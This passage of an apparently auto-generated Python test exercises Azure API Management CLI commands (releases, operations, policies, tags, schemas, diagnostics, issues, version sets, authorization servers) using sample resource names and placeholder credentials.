self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
# create_or_update -- create
self.cmd('apim api release create --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev" --notes "yahooagain"', checks=[
])
self.cmd('apim api release create --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev" --notes "yahooagain"', checks=[
])
self.cmd('apim api release create --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d" --release-id "testrev"', checks=[
])
# create_or_update -- update
self.cmd('apim api release update --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev" --notes "yahooagain"', checks=[
])
self.cmd('apim api release update --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev" --notes "yahooagain"', checks=[
])
self.cmd('apim api release update --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d" --release-id "testrev"', checks=[
])
# delete -- delete
self.cmd('apim api release delete --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev"', checks=[
])
self.cmd('apim api release delete --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev"', checks=[
])
self.cmd('apim api release delete --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d" --release-id "testrev"', checks=[
])
# list_by_service -- list
self.cmd('apim api release list --resource-group "rg1" --service-name "apimService1" --api-id "a1"', checks=[
])
self.cmd('apim api release list --resource-group "rg1" --service-name "apimService1" --api-id "a1"', checks=[
])
self.cmd('apim api release list --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d"', checks=[
])
# get -- show
self.cmd('apim api release show --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev"', checks=[
])
self.cmd('apim api release show --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev"', checks=[
])
self.cmd('apim api release show --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d" --release-id "testrev"', checks=[
])
# create_or_update -- create
self.cmd('apim api operation create --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2" --operation-id "newoperations" --description "This can only be done by the logged in user." --display-name "createUser2" --method "POST" --url-template "/user1"', checks=[
])
self.cmd('apim api operation create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --operation-id "operationId" --display-name "Retrieve resource" --method "GET" --url-template "/resource"', checks=[
])
self.cmd('apim api operation create --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3" --operation-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# create_or_update -- update
self.cmd('apim api operation update --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2" --operation-id "newoperations" --description "This can only be done by the logged in user." --display-name "createUser2" --method "POST" --url-template "/user1"', checks=[
])
self.cmd('apim api operation update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --operation-id "operationId" --display-name "Retrieve resource" --method "GET" --url-template "/resource"', checks=[
])
self.cmd('apim api operation update --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3" --operation-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# delete -- delete
self.cmd('apim api operation delete --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2" --operation-id "newoperations"', checks=[
])
self.cmd('apim api operation delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --operation-id "operationId"', checks=[
])
self.cmd('apim api operation delete --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3" --operation-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# list_by_api -- list
self.cmd('apim api operation list --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2"', checks=[
])
self.cmd('apim api operation list --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
self.cmd('apim api operation list --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# get -- show
self.cmd('apim api operation show --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2" --operation-id "newoperations"', checks=[
])
self.cmd('apim api operation show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --operation-id "operationId"', checks=[
])
self.cmd('apim api operation show --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3" --operation-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
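# Policy documents are passed inline through --value, either as plain XML (as in
# the next command) or, further below, as raw XML with escaped quotes and \r\n
# sequences; --format tells the service how to interpret the document ("xml" vs
# "rawxml", or the corresponding *-link formats when --value is a URL).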
# create_or_update -- create
self.cmd('apim api operation policy create --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001" --policy-id "policy" --value "<policies> <inbound /> <backend> <forward-request /> </backend> <outbound /></policies>" --format "xml"', checks=[
])
self.cmd('apim api operation policy create --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation" --policy-id "policy"', checks=[
])
# create_or_update -- update
self.cmd('apim api operation policy update --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001" --policy-id "policy" --value "<policies> <inbound /> <backend> <forward-request /> </backend> <outbound /></policies>" --format "xml"', checks=[
])
self.cmd('apim api operation policy update --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation" --policy-id "policy"', checks=[
])
# delete -- delete
self.cmd('apim api operation policy delete --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001" --policy-id "policy"', checks=[
])
self.cmd('apim api operation policy delete --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation" --policy-id "policy"', checks=[
])
# list_by_operation -- list
self.cmd('apim api operation policy list --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001"', checks=[
])
self.cmd('apim api operation policy list --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation"', checks=[
])
# get -- show
self.cmd('apim api operation policy show --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --operation-id "5600b57e7e8880006a080001" --format "xml" --policy-id "policy"', checks=[
])
self.cmd('apim api operation policy show --resource-group "rg1" --service-name "apimService1" --api-id "testapi" --operation-id "testoperation" --policy-id "policy"', checks=[
])
# create_or_update -- create
self.cmd('apim tag create --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1" --display-name "tag1"', checks=[
])
self.cmd('apim tag create --resource-group "rg1" --service-name "apimService1" --tag-id "temptag" --display-name "temp tag"', checks=[
])
self.cmd('apim tag create --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
# create_or_update -- update
self.cmd('apim tag update --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1" --display-name "tag1"', checks=[
])
self.cmd('apim tag update --resource-group "rg1" --service-name "apimService1" --tag-id "temptag" --display-name "temp tag"', checks=[
])
self.cmd('apim tag update --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
# delete -- delete
self.cmd('apim tag delete --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
self.cmd('apim tag delete --resource-group "rg1" --service-name "apimService1" --tag-id "temptag"', checks=[
])
self.cmd('apim tag delete --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
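# list_by_operation, list_by_product, list_by_api and list_by_service all surface
# here as the same `apim tag list` command because the generated invocations omit
# the scoping parameters; the repeated calls below simply confirm that listing
# tags succeeds.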
# list_by_operation -- list
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_product -- list
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_api -- list
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_service -- list
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim tag list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim tag show --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
self.cmd('apim tag show --resource-group "rg1" --service-name "apimService1" --tag-id "temptag"', checks=[
])
self.cmd('apim tag show --resource-group "rg1" --service-name "apimService1" --tag-id "tagId1"', checks=[
])
# create_or_update -- create
self.cmd('apim api policy create --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --value "<policies> <inbound /> <backend> <forward-request /> </backend> <outbound /></policies>" --format "xml"', checks=[
])
self.cmd('apim api policy create --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --value "<policies>\r\n <inbound>\r\n <base />\r\n <set-header name=\"newvalue\" exists-action=\"override\">\r\n <value>\"@(context.Request.Headers.FirstOrDefault(h => h.Ke==\"Via\"))\" </value>\r\n </set-header>\r\n </inbound>\r\n </policies>" --format "rawxml"', checks=[
])
self.cmd('apim api policy create --resource-group "rg1" --service-name "apimService1" --api-id "loggerId" --policy-id "policy"', checks=[
])
# create_or_update -- update
self.cmd('apim api policy update --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --value "<policies> <inbound /> <backend> <forward-request /> </backend> <outbound /></policies>" --format "xml"', checks=[
])
self.cmd('apim api policy update --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --value "<policies>\r\n <inbound>\r\n <base />\r\n <set-header name=\"newvalue\" exists-action=\"override\">\r\n <value>\"@(context.Request.Headers.FirstOrDefault(h => h.Ke==\"Via\"))\" </value>\r\n </set-header>\r\n </inbound>\r\n </policies>" --format "rawxml"', checks=[
])
self.cmd('apim api policy update --resource-group "rg1" --service-name "apimService1" --api-id "loggerId" --policy-id "policy"', checks=[
])
# delete -- delete
self.cmd('apim api policy delete --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy"', checks=[
])
self.cmd('apim api policy delete --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy"', checks=[
])
self.cmd('apim api policy delete --resource-group "rg1" --service-name "apimService1" --api-id "loggerId" --policy-id "policy"', checks=[
])
# list_by_api -- list
self.cmd('apim api policy list --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001"', checks=[
])
self.cmd('apim api policy list --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001"', checks=[
])
self.cmd('apim api policy list --resource-group "rg1" --service-name "apimService1" --api-id "loggerId"', checks=[
])
# get -- show
self.cmd('apim api policy show --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --format "xml"', checks=[
])
self.cmd('apim api policy show --resource-group "rg1" --service-name "apimService1" --api-id "5600b57e7e8880006a040001" --policy-id "policy" --format "rawxml"', checks=[
])
self.cmd('apim api policy show --resource-group "rg1" --service-name "apimService1" --api-id "loggerId" --policy-id "policy"', checks=[
])
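# API schema documents are identified by --schema-id and typed by --content-type
# (here the APIM-specific media type for an XSD schema); the generated examples
# omit the schema document body itself.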
# create_or_update -- create
self.cmd('apim api schema create --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b" --schema-id "ec12520d-9d48-4e7b-8f39-698ca2ac63f1" --content-type "application/vnd.ms-azure-apim.xsd+xml"', checks=[
])
self.cmd('apim api schema create --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --schema-id "59d5b28e1f7fab116402044e"', checks=[
])
# create_or_update -- update
self.cmd('apim api schema update --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b" --schema-id "ec12520d-9d48-4e7b-8f39-698ca2ac63f1" --content-type "application/vnd.ms-azure-apim.xsd+xml"', checks=[
])
self.cmd('apim api schema update --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --schema-id "59d5b28e1f7fab116402044e"', checks=[
])
# delete -- delete
self.cmd('apim api schema delete --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b" --schema-id "ec12520d-9d48-4e7b-8f39-698ca2ac63f1"', checks=[
])
self.cmd('apim api schema delete --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --schema-id "59d5b28e1f7fab116402044e"', checks=[
])
# list_by_api -- list
self.cmd('apim api schema list --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b"', checks=[
])
self.cmd('apim api schema list --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650"', checks=[
])
# get -- show
self.cmd('apim api schema show --resource-group "rg1" --service-name "apimService1" --api-id "59d6bb8f1f7fab13dc67ec9b" --schema-id "ec12520d-9d48-4e7b-8f39-698ca2ac63f1"', checks=[
])
self.cmd('apim api schema show --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --schema-id "59d5b28e1f7fab116402044e"', checks=[
])
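# Diagnostic settings attach a logger to the API; --logger-id takes the logger's
# path relative to the service (e.g. "/loggers/applicationinsights"), and that
# logger must already exist for a live run to succeed.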
# create_or_update -- create
self.cmd('apim api diagnostic create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim api diagnostic create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim api diagnostic create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
# create_or_update -- update
self.cmd('apim api diagnostic update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim api diagnostic update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim api diagnostic update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
# delete -- delete
self.cmd('apim api diagnostic delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim api diagnostic delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim api diagnostic delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
# list_by_service -- list
self.cmd('apim api diagnostic list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
self.cmd('apim api diagnostic list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
self.cmd('apim api diagnostic list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
# get -- show
self.cmd('apim api diagnostic show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim api diagnostic show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim api diagnostic show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --diagnostic-id "applicationinsights"', checks=[
])
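# The issue, comment and attachment examples below reuse fixed GUID-like IDs from
# the swagger samples; --user-id points at an existing user resource under the
# service (here given as a templated ARM resource ID).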
# create_or_update -- create
self.cmd('apim api issue create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --created-date "2018-02-01T22:21:20.467Z" --state "open" --title "New API issue" --description "New API issue description" --user-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}"', checks=[
])
self.cmd('apim api issue create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --state "closed"', checks=[
])
self.cmd('apim api issue create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# create_or_update -- update
self.cmd('apim api issue update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --created-date "2018-02-01T22:21:20.467Z" --state "open" --title "New API issue" --description "New API issue description" --user-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}"', checks=[
])
self.cmd('apim api issue update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --state "closed"', checks=[
])
self.cmd('apim api issue update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# delete -- delete
self.cmd('apim api issue delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# list_by_service -- list
self.cmd('apim api issue list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
self.cmd('apim api issue list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
self.cmd('apim api issue list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a"', checks=[
])
# get -- show
self.cmd('apim api issue show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# create_or_update -- create
self.cmd('apim api issue comment create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb" --text "Issue comment." --created-date "2018-02-01T22:21:20.467Z" --user-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}"', checks=[
])
self.cmd('apim api issue comment create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
# create_or_update -- update
self.cmd('apim api issue comment update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb" --text "Issue comment." --created-date "2018-02-01T22:21:20.467Z" --user-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}"', checks=[
])
self.cmd('apim api issue comment update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
# delete -- delete
self.cmd('apim api issue comment delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
self.cmd('apim api issue comment delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
# list_by_service -- list
self.cmd('apim api issue comment list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue comment list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# get -- show
self.cmd('apim api issue comment show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
self.cmd('apim api issue comment show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --comment-id "599e29ab193c3c0bd0b3e2fb"', checks=[
])
# create_or_update -- create
self.cmd('apim api issue attachment create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3" --title "Issue attachment." --content-format "image/jpeg" --content "IEJhc2U2NA=="', checks=[
])
self.cmd('apim api issue attachment create --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# create_or_update -- update
self.cmd('apim api issue attachment update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3" --title "Issue attachment." --content-format "image/jpeg" --content "IEJhc2U2NA=="', checks=[
])
self.cmd('apim api issue attachment update --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# delete -- delete
self.cmd('apim api issue attachment delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
self.cmd('apim api issue attachment delete --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# list_by_service -- list
self.cmd('apim api issue attachment list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
self.cmd('apim api issue attachment list --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
# get -- show
self.cmd('apim api issue attachment show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
self.cmd('apim api issue attachment show --resource-group "rg1" --service-name "apimService1" --api-id "57d1f7558aa04f15146d9d8a" --issue-id "57d2ef278aa04f0ad01d6cdc" --attachment-id "57d2ef278aa04f0888cba3f3"', checks=[
])
# create_or_update -- create
self.cmd('apim api tag-description create --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b" --tag-id "tagId1" --description "Some description that will be displayed for operation's tag if the tag is assigned to operation of the API" --external-docs-url "http://some.url/additionaldoc" --external-docs-description "Description of the external docs resource"', checks=[
])
self.cmd('apim api tag-description create --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --tag-id "59d5b28e1f7fab116402044e"', checks=[
])
# create_or_update -- update
self.cmd('apim api tag-description update --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b" --tag-id "tagId1" --description "Some description that will be displayed for operation's tag if the tag is assigned to operation of the API" --external-docs-url "http://some.url/additionaldoc" --external-docs-description "Description of the external docs resource"', checks=[
])
self.cmd('apim api tag-description update --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --tag-id "59d5b28e1f7fab116402044e"', checks=[
])
# delete -- delete
self.cmd('apim api tag-description delete --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b" --tag-id "tagId1"', checks=[
])
self.cmd('apim api tag-description delete --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --tag-id "59d5b28e1f7fab116402044e"', checks=[
])
# list_by_service -- list
self.cmd('apim api tag-description list --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b"', checks=[
])
self.cmd('apim api tag-description list --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650"', checks=[
])
# get -- show
self.cmd('apim api tag-description show --resource-group "rg1" --service-name "apimService1" --api-id "5931a75ae4bbd512a88c680b" --tag-id "tagId1"', checks=[
])
self.cmd('apim api tag-description show --resource-group "rg1" --service-name "apimService1" --api-id "59d5b28d1f7fab116c282650" --tag-id "59d5b28e1f7fab116402044e"', checks=[
])
# create_or_update -- create
self.cmd('apim api-version-set create --resource-group "rg1" --service-name "apimService1" --version-set-id "api1" --description "Version configuration" --display-name "api set 1" --versioning-scheme "Segment"', checks=[
])
self.cmd('apim api-version-set create --resource-group "rg1" --service-name "apimService1" --version-set-id "api1" --description "Version configuration" --display-name "api set 1" --versioning-scheme "Segment"', checks=[
])
self.cmd('apim api-version-set create --resource-group "rg1" --service-name "apimService1" --version-set-id "a1"', checks=[
])
# create_or_update -- update
self.cmd('apim api-version-set update --resource-group "rg1" --service-name "apimService1" --version-set-id "api1" --description "Version configuration" --display-name "api set 1" --versioning-scheme "Segment"', checks=[
])
self.cmd('apim api-version-set update --resource-group "rg1" --service-name "apimService1" --version-set-id "api1" --description "Version configuration" --display-name "api set 1" --versioning-scheme "Segment"', checks=[
])
self.cmd('apim api-version-set update --resource-group "rg1" --service-name "apimService1" --version-set-id "a1"', checks=[
])
# delete -- delete
self.cmd('apim api-version-set delete --resource-group "rg1" --service-name "apimService1" --version-set-id "api1"', checks=[
])
self.cmd('apim api-version-set delete --resource-group "rg1" --service-name "apimService1" --version-set-id "api1"', checks=[
])
self.cmd('apim api-version-set delete --resource-group "rg1" --service-name "apimService1" --version-set-id "a1"', checks=[
])
# list_by_service -- list
self.cmd('apim api-version-set list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api-version-set list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api-version-set list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim api-version-set show --resource-group "rg1" --service-name "apimService1" --version-set-id "api1"', checks=[
])
self.cmd('apim api-version-set show --resource-group "rg1" --service-name "apimService1" --version-set-id "api1"', checks=[
])
self.cmd('apim api-version-set show --resource-group "rg1" --service-name "apimService1" --version-set-id "a1"', checks=[
])
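# The authorization-server examples pass client IDs, client secrets and
# resource-owner credentials inline; these are sample values from the swagger
# examples, not real credentials, and a live run would need a valid OAuth2 client
# registration behind the endpoints shown.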
# create_or_update -- create
self.cmd('apim authorization-server create --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer" --description "test server" --token-endpoint "https://www.contoso.com/oauth2/token" --support-state true --default-scope "read write" --client-secret "2" --resource-owner-username "un" --resource-owner-password "pwd" --display-name "test2" --client-registration-endpoint "https://www.contoso.com/apps" --authorization-endpoint "https://www.contoso.com/oauth2/auth" --client-id "1"', checks=[
])
self.cmd('apim authorization-server create --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer" --client-secret "updated" --client-id "update"', checks=[
])
self.cmd('apim authorization-server create --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer2"', checks=[
])
# create_or_update -- update
